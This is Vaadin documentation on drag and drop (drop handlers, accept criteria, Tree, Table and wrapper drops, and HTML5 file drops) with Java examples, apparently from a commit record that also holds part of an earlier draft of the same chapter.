Three components implement the interface:\n[classname]#Tree#, [classname]#Table#, and [classname]#DragAndDropWrapper#.\nThe accept and drop operations need to be provided in a __drop handler__.\nEssentially, all you need to do to enable drag and drop is to enable dragging in\nthe drag source and implement the [methodname]#getAcceptCriterion()# and\n[methodname]#drop()# methods in the [classname]#DropHandler# interface.\n\nThe client-server architecture of Vaadin causes special requirements for the\ndrag and drop functionality. The logic for determining where a dragged object\ncan be dropped, that is, __accepting__ a drop, should normally be done on the\nclient-side, in the browser. Server communications are too slow to have much of\nsuch logic on the server-side. The drag and drop feature therefore offers a\nnumber of ways to avoid server communications to ensure a good user\nexperience.\n\n[[advanced.dragndrop.drophandler]]\n== Handling Drops\n\nMost of the user-defined drag and drop logic occurs in a __drop handler__, which\nis provided by implementing the [methodname]#drop()# method in the\n[classname]#DropHandler# interface. A closely related definition is the drop\naccept criterion, which is defined in the [methodname]#getAcceptCriterion()#\nmethod in the same interface. It is described in\n<<advanced.dragndrop.acceptcriteria>> later.\n\nThe [methodname]#drop()# method gets a [classname]#DragAndDropEvent# as its\nparameter. The event object provides references to two important objects:\n[classname]#Transferable# and [classname]#TargetDetails#.\n\nA [classname]#Transferable# contains a reference to the object (component or\ndata item) that is being dragged. A tree or table item is represented as a\n[classname]#TreeTransferable# or [classname]#TableTransferable# object, which\ncarries the item identifier of the dragged tree or table item. These special\ntransferables, which are bound to some data in a container, are\n[classname]#DataBoundTransferable#. Dragged components are represented as\n[classname]#WrapperTransferable# objects, as the components are wrapped in a\n[classname]#DragAndDropWrapper#.\n\nThe [classname]#TargetDetails# object provides information about the exact\nlocation where the transferable object is being dropped. The exact class of the\ndetails object depends on the drop target, and you need to cast it to the proper\nsubclass to get more detailed information. If the target is a selection component,\nessentially a tree or a table, the [classname]#AbstractSelectTargetDetails#\nobject identifies the item on which the drop is being made. For trees, the\n[classname]#TreeTargetDetails# gives some more details. For wrapped components,\nthe information is provided in a [classname]#WrapperDropDetails# object. In\naddition to the target item or component, the details objects provide a __drop\nlocation__. For selection components, the location can be obtained with the\n[methodname]#getDropLocation()# method, and for wrapped components with\n[methodname]#verticalDropLocation()# and [methodname]#horizontalDropLocation()#.\nThe locations are specified as either [classname]#VerticalDropLocation# or\n[classname]#HorizontalDropLocation# objects. The drop location objects specify\nwhether the transferable is being dropped above, below, or directly on (at the\nmiddle of) a component or item.
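\n\nA minimal skeleton of a drop handler, then, looks as follows. The sketch assumes a drop on a selection component (so the details are cast to [classname]#AbstractSelectTargetDetails#); accept criteria are covered in <<advanced.dragndrop.acceptcriteria>>.\n\n[source, java]\n----\nDropHandler handler = new DropHandler() {\n    public AcceptCriterion getAcceptCriterion() {\n        return AcceptAll.get(); \/\/ accept anything (see later)\n    }\n\n    public void drop(DragAndDropEvent event) {\n        \/\/ What is being dragged\n        Transferable t = event.getTransferable();\n        if (t instanceof DataBoundTransferable) {\n            Object sourceItemId =\n                ((DataBoundTransferable) t).getItemId();\n        }\n\n        \/\/ Where it is being dropped; the cast depends on the target\n        AbstractSelectTargetDetails details =\n            (AbstractSelectTargetDetails) event.getTargetDetails();\n        Object targetItemId = details.getItemIdOver();\n        VerticalDropLocation location = details.getDropLocation();\n    }\n};\n----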
\n\nDropping on a [classname]#Tree#, [classname]#Table#, and a wrapped component is\nexplained further in the following sections.\n\n\n[[advanced.dragndrop.treedrop]]\n== Dropping Items On a [classname]#Tree#\n\nYou can drag items from, to, or within a [classname]#Tree#. Making a tree a drag\nsource simply requires setting the drag mode with [methodname]#setDragMode()#.\n[classname]#Tree# currently supports only one drag mode,\n[literal]#++TreeDragMode.NODE++#, which allows dragging single tree nodes. While\ndragging, the dragged node is referenced with a [classname]#TreeTransferable#\nobject, which is a [classname]#DataBoundTransferable#. The tree node is\nidentified by the item ID of the container item.\n\nWhen a transferable is dropped on a tree, the drop location is stored in a\n[classname]#TreeTargetDetails# object, which identifies the target location by\nthe item ID of the tree node on which the drop is made. You can get the item ID\nwith the [methodname]#getItemIdOver()# method in\n[classname]#AbstractSelectTargetDetails#, which\n[classname]#TreeTargetDetails# inherits. A drop can occur directly on, above,\nor below a node; the exact location is a [classname]#VerticalDropLocation#,\nwhich you can get with the [methodname]#getDropLocation()# method.\n\nIn the example below, we have a [classname]#Tree# and we allow reordering the\ntree items by drag and drop.\n\n\n[source, java]\n----\nfinal Tree tree = new Tree(\"Inventory\");\ntree.setContainerDataSource(TreeExample.createTreeContent());\nlayout.addComponent(tree);\n\n\/\/ Expand all items\nfor (Iterator<?> it = tree.rootItemIds().iterator(); it.hasNext();)\n    tree.expandItemsRecursively(it.next());\n\n\/\/ Set the tree in drag source mode\ntree.setDragMode(TreeDragMode.NODE);\n\n\/\/ Allow the tree to receive drag drops and handle them\ntree.setDropHandler(new DropHandler() {\n    public AcceptCriterion getAcceptCriterion() {\n        return AcceptAll.get();\n    }\n\n    public void drop(DragAndDropEvent event) {\n        \/\/ Wrapper for the object that is dragged\n        Transferable t = event.getTransferable();\n\n        \/\/ Make sure the drag source is the same tree\n        if (t.getSourceComponent() != tree)\n            return;\n\n        TreeTargetDetails target = (TreeTargetDetails)\n                event.getTargetDetails();\n\n        \/\/ Get ids of the dragged item and the target item\n        Object sourceItemId = t.getData(\"itemId\");\n        Object targetItemId = target.getItemIdOver();\n\n        \/\/ On which side of the target the item was dropped\n        VerticalDropLocation location = target.getDropLocation();\n\n        HierarchicalContainer container = (HierarchicalContainer)\n                tree.getContainerDataSource();\n\n        \/\/ Drop right on an item -> make it a child\n        if (location == VerticalDropLocation.MIDDLE)\n            tree.setParent(sourceItemId, targetItemId);\n\n        \/\/ Drop at the top of a subtree -> make it the previous sibling\n        else if (location == VerticalDropLocation.TOP) {\n            Object parentId = container.getParent(targetItemId);\n            container.setParent(sourceItemId, parentId);\n            container.moveAfterSibling(sourceItemId, targetItemId);\n            container.moveAfterSibling(targetItemId, sourceItemId);\n        }\n\n        \/\/ Drop below another item -> make it the next sibling\n        else if (location == VerticalDropLocation.BOTTOM) {\n            Object parentId = container.getParent(targetItemId);\n            container.setParent(sourceItemId, parentId);\n            container.moveAfterSibling(sourceItemId, targetItemId);\n        }\n    }\n});\n----
\n\n[[advanced.dragndrop.treedrop.criteria]]\n=== Accept Criteria for Trees\n\n[classname]#Tree# defines some specialized accept criteria for trees.\n\n[classname]#TargetInSubtree# (client-side):: Accepts if the target item is in the specified sub-tree. The sub-tree is specified by the item ID of the root of the sub-tree in the constructor. The second constructor includes a depth parameter, which specifies how deep from the given root node drops are accepted. Value [literal]#++-1++# means infinite, that is, the entire sub-tree, and is therefore the same as the simpler constructor.\n[classname]#TargetItemAllowsChildren# (client-side):: Accepts a drop if the tree has [methodname]#setChildrenAllowed()# enabled for the target item. The criterion does not require parameters, so the class is a singleton and can be acquired with [methodname]#Tree.TargetItemAllowsChildren.get()#. For example, the following composite criterion accepts drops only on nodes that allow children, but between all nodes:\n+\n[source, java]\n----\nreturn new Or(Tree.TargetItemAllowsChildren.get(),\n              new Not(VerticalLocationIs.MIDDLE));\n----\n\n[classname]#TreeDropCriterion# (server-side):: Accepts drops on only some items, which are specified by a set of item IDs. You must extend the abstract class and implement [methodname]#getAllowedItemIds()# to return the set. While the criterion is server-side, it is lazy-loading, so that the list of accepted target nodes is loaded only once from the server for each drag operation. See <<advanced.dragndrop.acceptcriteria>> for an example.\n\n\nIn addition, the accept criteria defined in [classname]#AbstractSelect# are\navailable for a [classname]#Tree#, as listed in\n<<advanced.dragndrop.acceptcriteria>>.\n\n\n\n[[advanced.dragndrop.tabledrop]]\n== Dropping Items On a [classname]#Table#\n\nYou can drag items from, to, or within a [classname]#Table#. Making a table a drag\nsource simply requires setting the drag mode with [methodname]#setDragMode()#.\n[classname]#Table# supports dragging both single rows, with\n[literal]#++TableDragMode.ROW++#, and multiple rows, with\n[literal]#++TableDragMode.MULTIROW++#. While dragging, the dragged row or rows\nare referenced with a [classname]#TableTransferable# object, which is a\n[classname]#DataBoundTransferable#. Table rows are identified by the item IDs of\nthe container items.\n\nWhen a transferable is dropped on a table, the drop location is stored in an\n[classname]#AbstractSelectTargetDetails# object, which identifies the target row\nby its item ID. You can get the item ID with the [methodname]#getItemIdOver()#\nmethod. A drop can occur directly on, above, or below a row; the exact location\nis a [classname]#VerticalDropLocation#, which you can get with the\n[methodname]#getDropLocation()# method from the details object.
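\n\nThe following sketch, modeled on the tree example above, enables single-row dragging and reads the dragged and target item IDs in the drop handler. How the row is then reordered is left out, since it depends on the container implementation; the `table` variable is assumed to be an existing [classname]#Table#.\n\n[source, java]\n----\ntable.setDragMode(TableDragMode.ROW);\ntable.setDropHandler(new DropHandler() {\n    public AcceptCriterion getAcceptCriterion() {\n        return AcceptAll.get();\n    }\n\n    public void drop(DragAndDropEvent event) {\n        DataBoundTransferable t = (DataBoundTransferable)\n                event.getTransferable();\n\n        \/\/ Make sure the drag source is the same table\n        if (t.getSourceComponent() != table)\n            return;\n\n        AbstractSelectTargetDetails target = (AbstractSelectTargetDetails)\n                event.getTargetDetails();\n\n        Object sourceItemId = t.getItemId();\n        Object targetItemId = target.getItemIdOver();\n        VerticalDropLocation location = target.getDropLocation();\n\n        \/\/ Reorder sourceItemId relative to targetItemId here,\n        \/\/ as appropriate for the container in use\n    }\n});\n----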
\n\n[[advanced.dragndrop.tabledrop.criteria]]\n=== Accept Criteria for Tables\n\n[classname]#Table# defines one specialized accept criterion for tables.\n\n[classname]#TableDropCriterion# (server-side):: Accepts drops only on (or above or below) items that are specified by a set of item IDs. You must extend the abstract class and implement [methodname]#getAllowedItemIds()# to return the set. While the criterion is server-side, it is lazy-loading, so that the list of accepted target items is loaded only once from the server for each drag operation. A minimal sketch is given below.
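\n\nThe sketch assumes that [methodname]#getAllowedItemIds()# has the same shape as in the [classname]#TreeDropCriterion# example later in this chapter, but with a [classname]#Table# parameter; the \"locked\" property used for filtering is hypothetical.\n\n[source, java]\n----\nTableDropCriterion criterion = new TableDropCriterion() {\n    @Override\n    protected Set<Object> getAllowedItemIds(\n            DragAndDropEvent dragEvent, Table table) {\n        HashSet<Object> allowed = new HashSet<Object>();\n        for (Object itemId : table.getItemIds()) {\n            \/\/ Allow drops only on rows that are not marked as locked\n            Property locked =\n                table.getItem(itemId).getItemProperty(\"locked\");\n            if (locked == null\n                    || !Boolean.TRUE.equals(locked.getValue()))\n                allowed.add(itemId);\n        }\n        return allowed;\n    }\n};\n----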
\n\n\n\n[[advanced.dragndrop.acceptcriteria]]\n== Accepting Drops\n\n(((\"Drag and Drop\", \"Accept Criteria\", id=\"term.advanced.dragndrop.acceptcriteria\", range=\"startofrange\")))\n\n\nYou cannot drop the objects you are dragging around just anywhere. Before a\ndrop is possible, the specific drop location on which the mouse hovers must be\n__accepted__. Hovering a dragged object over an accepted location displays an\n__accept indicator__, which allows the user to position the drop properly. Because\nsuch checks have to be made continuously while the mouse pointer moves around the\ndrop targets, it is not feasible to send the accept requests to the server-side,\nso drops on a target are normally accepted by a client-side __accept\ncriterion__.\n\nA drop handler must define the criterion for the objects which it accepts to be\ndropped on the target. The criterion needs to be provided in the\n[methodname]#getAcceptCriterion()# method of the [classname]#DropHandler#\ninterface. A criterion is represented in an [classname]#AcceptCriterion# object,\nwhich can be a composite of multiple criteria that are evaluated using logical\noperations. There are two basic types of criteria: __client-side__ and\n__server-side criteria__. The various built-in criteria allow accepting drops\nbased on the identity of the source and target components, and on the __data\nflavor__ of the dragged objects.\n\nTo allow dropping any transferable objects, you can return a universal accept\ncriterion, which you can get with [methodname]#AcceptAll.get()#.\n\n\n[source, java]\n----\ntree.setDropHandler(new DropHandler() {\n    public AcceptCriterion getAcceptCriterion() {\n        return AcceptAll.get();\n    }\n    ...\n----\n\n[[advanced.dragndrop.acceptcriteria.client-side]]\n=== Client-Side Criteria\n\nThe __client-side criteria__, which inherit\n[classname]#ClientSideCriterion#, are verified on the client-side, so server\nrequests are not needed for verifying whether each component on which the mouse\npointer hovers would accept a certain object.\n\nThe following client-side criteria are defined in\n[package]#com.vaadin.event.dd.acceptcriterion#; a composite example follows the list:\n\n[classname]#AcceptAll#:: Accepts all transferables and targets.\n[classname]#And#:: Performs the logical AND operation on two or more client-side criteria; accepts the transferable if all the given sub-criteria accept it.\n[classname]#ContainsDataFlavour#:: The transferable must contain the defined data flavor.\n[classname]#Not#:: Performs the logical NOT operation on a client-side criterion; accepts the transferable if and only if the sub-criterion does not accept it.\n[classname]#Or#:: Performs the logical OR operation on two or more client-side criteria; accepts the transferable if any of the given sub-criteria accepts it.\n[classname]#SourceIs#:: Accepts all transferables from any of the given source components.\n[classname]#SourceIsTarget#:: Accepts the transferable only if the source component is the same as the target. This criterion is useful for ensuring that items are dragged only within a tree or a table, and not from outside it.\n[classname]#TargetDetailIs#:: Accepts any transferable if the target detail, such as the item of a tree node or table row, is of the given data flavor and has the given value.
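\n\nThe logical criteria can be used to compose the others into more specific conditions. For example, the following hypothetical composite (assuming two existing tables, `table1` and `table2`) accepts a transferable only if it originates from one of the two tables and is not dropped directly on an item:\n\n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n    \/\/ Drags from table1 or table2, only between items\n    return new And(new SourceIs(table1, table2),\n                   new Not(VerticalLocationIs.MIDDLE));\n}\n----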
\n\n\nIn addition, target components such as [classname]#Tree# and [classname]#Table#\ndefine some component-specific client-side accept criteria. See\n<<advanced.dragndrop.treedrop>> for more details.\n\n[classname]#AbstractSelect# defines the following criteria for all selection\ncomponents, including [classname]#Tree# and [classname]#Table#.\n\n[classname]#AcceptItem#:: Accepts only specific items from a specific selection component. The selection component, which must inherit [classname]#AbstractSelect#, is given as the first parameter for the constructor. It is followed by a list of allowed item identifiers in the drag source.\n[classname]#AcceptItem.ALL#:: Accepts all transferables as long as they are items.\n[classname]#TargetItemIs#:: Accepts all drops on the specified target items. The constructor requires the target component ([classname]#AbstractSelect#) followed by a list of allowed item identifiers.\n[classname]#VerticalLocationIs.MIDDLE#, [classname]#TOP#, and [classname]#BOTTOM#:: The three static criteria accept drops on, above, or below an item. For example, you could accept drops only in between items with the following:\n+\n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n    return new Not(VerticalLocationIs.MIDDLE);\n}\n----\n\n\n[[advanced.dragndrop.acceptcriteria.server-side]]\n=== Server-Side Criteria\n\nThe __server-side criteria__ are verified on the server-side with the\n[methodname]#accept()# method of the [classname]#ServerSideCriterion# class.\nThis allows fully programmable logic for accepting drops, but the negative side\nis that it causes a very large number of server requests. A request is made for\nevery target position on which the pointer hovers. This problem is eased in many\ncases by the component-specific lazy-loading criteria\n[classname]#TableDropCriterion# and [classname]#TreeDropCriterion#. They visit the\nserver only once for each drag and drop operation and return all accepted rows\nor nodes for the current [classname]#Transferable# at once.\n\nThe [methodname]#accept()# method gets the drag event as a parameter, so it can\nperform its logic much like in [methodname]#drop()#.\n\n\n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n    \/\/ Server-side accept criterion that allows drops on any other\n    \/\/ location except on nodes that may not have children\n    ServerSideCriterion criterion = new ServerSideCriterion() {\n        public boolean accept(DragAndDropEvent dragEvent) {\n            TreeTargetDetails target = (TreeTargetDetails)\n                    dragEvent.getTargetDetails();\n\n            \/\/ The tree item on which the drag hovers\n            Object targetItemId = target.getItemIdOver();\n\n            \/\/ On which side of the target the item is hovered\n            VerticalDropLocation location = target.getDropLocation();\n            if (location == VerticalDropLocation.MIDDLE)\n                if (!tree.areChildrenAllowed(targetItemId))\n                    return false; \/\/ Not accepted\n\n            return true; \/\/ Accept everything else\n        }\n    };\n    return criterion;\n}\n----\n\nThe server-side criteria base class [classname]#ServerSideCriterion# provides a\ngeneric [methodname]#accept()# method. The more specific\n[classname]#TableDropCriterion# and [classname]#TreeDropCriterion# are\nconvenience extensions that allow defining the allowed drop targets as a set of\nitems. They also provide some optimization by lazy loading, which reduces server\ncommunication significantly.\n\n\n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n    \/\/ Server-side accept criterion that allows drops on any\n    \/\/ other tree node except on nodes that may not have children\n    TreeDropCriterion criterion = new TreeDropCriterion() {\n        @Override\n        protected Set<Object> getAllowedItemIds(\n                DragAndDropEvent dragEvent, Tree tree) {\n            HashSet<Object> allowed = new HashSet<Object>();\n            for (Iterator<Object> i =\n                    tree.getItemIds().iterator(); i.hasNext();) {\n                Object itemId = i.next();\n                if (tree.hasChildren(itemId))\n                    allowed.add(itemId);\n            }\n            return allowed;\n        }\n    };\n    return criterion;\n}\n----
\n\n\n[[advanced.dragndrop.acceptcriteria.indicators]]\n=== Accept Indicators\n\nWhen a dragged object hovers on a drop target, an __accept indicator__ is\ndisplayed to show whether or not the location is accepted. For the\n[parameter]#MIDDLE# location, the indicator is a box around the target (tree\nnode, table row, or component). For vertical drop locations, the accepted\nlocations are shown as horizontal lines, and for horizontal drop locations as\nvertical lines.\n\nFor [classname]#DragAndDropWrapper# drop targets, you can disable the accept\nindicators or __drag hints__ with the [parameter]#no-vertical-drag-hints#,\n[parameter]#no-horizontal-drag-hints#, and [parameter]#no-box-drag-hints#\nstyles. You need to add the styles to the __layout that contains__ the wrapper,\nnot to the wrapper itself.\n\n\n[source, java]\n----\n\/\/ Have a wrapper\nDragAndDropWrapper wrapper = new DragAndDropWrapper(c);\nlayout.addComponent(wrapper);\n\n\/\/ Disable the hints\nlayout.addStyleName(\"no-vertical-drag-hints\");\nlayout.addStyleName(\"no-horizontal-drag-hints\");\nlayout.addStyleName(\"no-box-drag-hints\");\n----\n\n\n(((range=\"endofrange\", startref=\"term.advanced.dragndrop.acceptcriteria\")))\n\n[[advanced.dragndrop.dragging]]\n== Dragging Components\n\nDragging a component requires wrapping the source component within a\n[classname]#DragAndDropWrapper#. You can then allow dragging by putting the\nwrapper (and the component) in drag mode with [methodname]#setDragStartMode()#.\nThe method supports two drag modes, [parameter]#DragStartMode.WRAPPER# and\n[parameter]#DragStartMode.COMPONENT#, which define whether the entire wrapper\nor just the wrapped component is shown as the drag image while dragging.\n\n\n[source, java]\n----\n\/\/ Have a component to drag\nfinal Button button = new Button(\"An Absolute Button\");\n\n\/\/ Put the component in a D&D wrapper and allow dragging it\nfinal DragAndDropWrapper buttonWrap = new DragAndDropWrapper(button);\nbuttonWrap.setDragStartMode(DragStartMode.COMPONENT);\n\n\/\/ Set the wrapper to wrap tightly around the component\nbuttonWrap.setSizeUndefined();\n\n\/\/ Add the wrapper, not the component, to the layout\nlayout.addComponent(buttonWrap, \"left: 50px; top: 50px;\");\n----\n\nThe default height of [classname]#DragAndDropWrapper# is undefined, but the\ndefault width is 100%. If you want to ensure that the wrapper fits tightly\naround the wrapped component, you should call [methodname]#setSizeUndefined()#\nfor the wrapper. If you do so, make sure that the wrapped component does\nnot have a relative size, which would cause a conflicting size definition.\n\nDragged components are referenced in the [classname]#WrapperTransferable#. You\ncan get a reference to the dragged component with\n[methodname]#getDraggedComponent()#. The method returns [literal]#++null++#\nif the transferable is not a component. HTML 5 drags (described later) are also\nheld in wrapper transferables.\n\n\n[[advanced.dragndrop.drop-on-component]]\n== Dropping on a Component\n\nDrops on a component are enabled by wrapping the component in a\n[classname]#DragAndDropWrapper#. The wrapper is an ordinary component; the\nconstructor takes the wrapped component as a parameter. You just need to define\nthe [classname]#DropHandler# for the wrapper with\n[methodname]#setDropHandler()#.\n\nIn the following example, we allow moving components in an absolute layout.\nDetails on the drop handler are given later.\n\n\n[source, java]\n----\n\/\/ A layout that allows moving its contained components\n\/\/ by dragging and dropping them\nfinal AbsoluteLayout absLayout = new AbsoluteLayout();\nabsLayout.setWidth(\"100%\");\nabsLayout.setHeight(\"400px\");\n\n... put some (wrapped) components in the layout ...\n\n\/\/ Wrap the layout to allow handling drops\nDragAndDropWrapper layoutWrapper =\n        new DragAndDropWrapper(absLayout);\n\n\/\/ Handle moving components within the AbsoluteLayout\nlayoutWrapper.setDropHandler(new DropHandler() {\n    public AcceptCriterion getAcceptCriterion() {\n        return AcceptAll.get();\n    }\n\n    public void drop(DragAndDropEvent event) {\n        ...\n    }\n});\n----
\n\n[[advanced.dragndrop.drop-on-component.details]]\n=== Target Details for Wrapped Components\n\nThe drop handler receives the drop target details in a\n[classname]#WrapperTargetDetails# object, which implements the\n[classname]#TargetDetails# interface.\n\n\n[source, java]\n----\npublic void drop(DragAndDropEvent event) {\n    WrapperTransferable t =\n        (WrapperTransferable) event.getTransferable();\n    WrapperTargetDetails details =\n        (WrapperTargetDetails) event.getTargetDetails();\n----\n\nThe wrapper target details include a [classname]#MouseEventDetails# object,\nwhich you can get with [methodname]#getMouseEvent()#. You can use it to get the\nmouse coordinates for the position where the mouse button was released and the\ndrag ended. Similarly, you can find out the drag start position from the\ntransferable object (if it is a [classname]#WrapperTransferable#) with\n[methodname]#getMouseDownEvent()#.\n\n\n[source, java]\n----\n\/\/ Calculate the drag coordinate difference\nint xChange = details.getMouseEvent().getClientX()\n              - t.getMouseDownEvent().getClientX();\nint yChange = details.getMouseEvent().getClientY()\n              - t.getMouseDownEvent().getClientY();\n\n\/\/ Move the component in the absolute layout\nComponentPosition pos =\n    absLayout.getPosition(t.getSourceComponent());\npos.setLeftValue(pos.getLeftValue() + xChange);\npos.setTopValue(pos.getTopValue() + yChange);\n----\n\nYou can get the absolute x and y coordinates of the target wrapper with\n[methodname]#getAbsoluteLeft()# and [methodname]#getAbsoluteTop()#, which allows\nyou to translate the absolute mouse coordinates to coordinates relative to the\nwrapper. Notice that the coordinates are really the position of the wrapper, not\nthe wrapped component; the wrapper reserves some space for the accept\nindicators.\n\nThe [methodname]#verticalDropLocation()# and\n[methodname]#horizontalDropLocation()# methods return the more detailed drop\nlocation in the target.\n\n\n\n[[advanced.dragndrop.external]]\n== Dragging Files from Outside the Browser\n\nThe [classname]#DragAndDropWrapper# allows dragging files from outside the\nbrowser and dropping them on a component wrapped in the wrapper. Dropped files\nare automatically uploaded to the application and can be acquired from the\nwrapper with [methodname]#getFiles()#. The files are represented as\n[classname]#Html5File# objects as defined in the inner class. You can define an\nupload [classname]#Receiver# to receive the content of a file to an\n[classname]#OutputStream#.\n\nDragging and dropping files to the browser is supported in HTML 5 and requires a\ncompatible browser, such as Mozilla Firefox 3.6 or newer.
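\n\nAs a rough sketch of the structure (a hypothetical drop area; only the file metadata is inspected here, while actually receiving the content would additionally require attaching a receiver to each [classname]#Html5File#):\n\n[source, java]\n----\n\/\/ A drop area for files dragged from outside the browser\nLabel dropArea = new Label(\"Drop files here\");\nDragAndDropWrapper dropWrapper = new DragAndDropWrapper(dropArea);\ndropWrapper.setDropHandler(new DropHandler() {\n    public AcceptCriterion getAcceptCriterion() {\n        return AcceptAll.get();\n    }\n\n    public void drop(DragAndDropEvent event) {\n        WrapperTransferable t =\n            (WrapperTransferable) event.getTransferable();\n        Html5File[] files = t.getFiles();\n        if (files != null)\n            for (Html5File file : files)\n                Notification.show(\"Dropped \" + file.getFileName()\n                        + \" (\" + file.getFileSize() + \" bytes)\");\n    }\n});\nlayout.addComponent(dropWrapper);\n----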
\n\n\n(((range=\"endofrange\", startref=\"term.advanced.dragndrop\")))\n\n\n","old_contents":""
You can get the item ID with\n[methodname]#getItemIdOver()# method in\n[classname]#AbstractSelectTargetDetails#, which the\n[classname]#TreeTargetDetails# inherits. A drop can occur directly on or above\nor below a node; the exact location is a [classname]#VerticalDropLocation#,\nwhich you can get with the [methodname]#getDropLocation()# method.\n\nIn the example below, we have a [classname]#Tree# and we allow reordering the\ntree items by drag and drop.\n\n\n[source, java]\n----\nfinal Tree tree = new Tree(\"Inventory\");\ntree.setContainerDataSource(TreeExample.createTreeContent());\nlayout.addComponent(tree);\n \n\/\/ Expand all items\nfor (Iterator<?> it = tree.rootItemIds().iterator(); it.hasNext();)\n tree.expandItemsRecursively(it.next());\n \n\/\/ Set the tree in drag source mode\ntree.setDragMode(TreeDragMode.NODE);\n \n\/\/ Allow the tree to receive drag drops and handle them\ntree.setDropHandler(new DropHandler() {\n public AcceptCriterion getAcceptCriterion() {\n return AcceptAll.get();\n }\n\n public void drop(DragAndDropEvent event) {\n \/\/ Wrapper for the object that is dragged\n Transferable t = event.getTransferable();\n \n \/\/ Make sure the drag source is the same tree\n if (t.getSourceComponent() != tree)\n return;\n \n TreeTargetDetails target = (TreeTargetDetails)\n event.getTargetDetails();\n\n \/\/ Get ids of the dragged item and the target item\n Object sourceItemId = t.getData(\"itemId\");\n Object targetItemId = target.getItemIdOver();\n\n \/\/ On which side of the target the item was dropped \n VerticalDropLocation location = target.getDropLocation();\n \n HierarchicalContainer container = (HierarchicalContainer)\n tree.getContainerDataSource();\n\n \/\/ Drop right on an item -> make it a child\n if (location == VerticalDropLocation.MIDDLE)\n tree.setParent(sourceItemId, targetItemId);\n\n \/\/ Drop at the top of a subtree -> make it previous\n else if (location == VerticalDropLocation.TOP) {\n Object parentId = container.getParent(targetItemId);\n container.setParent(sourceItemId, parentId);\n container.moveAfterSibling(sourceItemId, targetItemId);\n container.moveAfterSibling(targetItemId, sourceItemId);\n }\n \n \/\/ Drop below another item -> make it next \n else if (location == VerticalDropLocation.BOTTOM) {\n Object parentId = container.getParent(targetItemId);\n container.setParent(sourceItemId, parentId);\n container.moveAfterSibling(sourceItemId, targetItemId);\n }\n }\n});\n----\n\n[[advanced.dragndrop.treedrop.criteria]]\n=== Accept Criteria for Trees\n\n[classname]#Tree# defines some specialized accept criteria for trees.\n\n[classname]#TargetInSubtree#(client-side):: Accepts if the target item is in the specified sub-tree. The sub-tree is specified by the item ID of the root of the sub-tree in the constructor. The second constructor includes a depth parameter, which specifies how deep from the given root node are drops accepted. Value [literal]#++-1++# means infinite, that is, the entire sub-tree, and is therefore the same as the simpler constructor.\n[classname]#TargetItemAllowsChildren#(client-side):: Accepts a drop if the tree has [methodname]#setChildrenAllowed()# enabled for the target item. The criterion does not require parameters, so the class is a singleton and can be acquired with [methodname]#Tree.TargetItemAllowsChildren.get()#. 
For example, the following composite criterion accepts drops only on nodes that allow children, but between all nodes: \n+\n[source, java]\n----\nreturn new Or (Tree.TargetItemAllowsChildren.get(), new Not(VerticalLocationIs.MIDDLE));\n----\n\n[classname]#TreeDropCriterion#(server-side):: Accepts drops on only some items, which as specified by a set of item IDs. You must extend the abstract class and implement the [methodname]#getAllowedItemIds()# to return the set. While the criterion is server-side, it is lazy-loading, so that the list of accepted target nodes is loaded only once from the server for each drag operation. See <<advanced.dragndrop.acceptcriteria>> for an example.\n\n\nIn addition, the accept criteria defined in [classname]#AbstractSelect# are\navailable for a [classname]#Tree#, as listed in\n<<advanced.dragndrop.acceptcriteria>>.\n\n\n\n[[advanced.dragndrop.tabledrop]]\n== Dropping Items On a [classname]#Table#\n\nYou can drag items from, to, or within a [classname]#Table#. Making table a drag\nsource requires simply setting the drag mode with [methodname]#setDragMode()#.\n[classname]#Table# supports dragging both single rows, with\n[literal]#++TableDragMode.ROW++#, and multiple rows, with\n[literal]#++TableDragMode.MULTIROW++#. While dragging, the dragged node or nodes\nare referenced with a [classname]#TreeTransferable# object, which is a\n[classname]#DataBoundTransferable#. Tree nodes are identified by the item IDs of\nthe container items.\n\nWhen a transferable is dropped on a table, the drop location is stored in a\n[classname]#AbstractSelectTargetDetails# object, which identifies the target row\nby its item ID. You can get the item ID with [methodname]#getItemIdOver()#\nmethod. A drop can occur directly on or above or below a row; the exact location\nis a [classname]#VerticalDropLocation#, which you can get with the\n[methodname]#getDropLocation()# method from the details object.\n\n[[advanced.dragndrop.tabledrop.criteria]]\n=== Accept Criteria for Tables\n\n[classname]#Table# defines one specialized accept criterion for tables.\n\n[classname]#TableDropCriterion#(server-side):: Accepts drops only on (or above or below) items that are specified by a set of item IDs. You must extend the abstract class and implement the [methodname]#getAllowedItemIds()# to return the set. While the criterion is server-side, it is lazy-loading, so that the list of accepted target items is loaded only once from the server for each drag operation.\n\n\n\n\n[[advanced.dragndrop.acceptcriteria]]\n== Accepting Drops\n\n(((\"Drag and Drop\", \"Accept Criteria\", id=\"term.advanced.dragndrop.acceptcriteria\", range=\"startofrange\")))\n\n\nYou can not drop the objects you are dragging around just anywhere. Before a\ndrop is possible, the specific drop location on which the mouse hovers must be\n__accepted__. Hovering a dragged object over an accepted location displays an\n__accept indicator__, which allows the user to position the drop properly. As\nsuch checks have to be done all the time when the mouse pointer moves around the\ndrop targets, it is not feasible to send the accept requests to the server-side,\nso drops on a target are normally accepted by a client-side __accept\ncriterion__.\n\nA drop handler must define the criterion on the objects which it accepts to be\ndropped on the target. The criterion needs to be provided in the\n[classname]#getAcceptCriterion()# method of the [classname]#DropHandler#\ninterface. 
A criterion is represented in an [classname]#AcceptCriterion# object,\nwhich can be a composite of multiple criteria that are evaluated using logical\noperations. There are two basic types of criteria: __client-side__ and\n__server-side criteria__. The various built-in criteria allow accepting drops\nbased on the identity of the source and target components, and on the __data\nflavor__ of the dragged objects.\n\nTo allow dropping any transferable objects, you can return a universal accept\ncriterion, which you can get with [methodname]#AcceptAll.get()#.\n\n\n[source, java]\n----\ntree.setDropHandler(new DropHandler() {\n public AcceptCriterion getAcceptCriterion() {\n return AcceptAll.get();\n }\n ...\n----\n\n[[advanced.dragndrop.acceptcriteria.client-side]]\n=== Client-Side Criteria\n\nThe __client-side criteria__, which inherit the\n[classname]#ClientSideCriterion#, are verified on the client-side, so server\nrequests are not needed for verifying whether each component on which the mouse\npointer hovers would accept a certain object.\n\nThe following client-side criteria are define in\n[package]#com.vaadin.event.dd.acceptcriterion#:\n\n[classname]#AcceptAll#:: Accepts all transferables and targets.\n[classname]#And#:: Performs the logical AND operation on two or more client-side criteria; accepts the transferable if all the given sub-criteria accept it.\n[classname]#ContainsDataFlavour#:: The transferable must contain the defined data flavour.\n[classname]#Not#:: Performs the logical NOT operation on a client-side criterion; accepts the transferable if and only if the sub-criterion does not 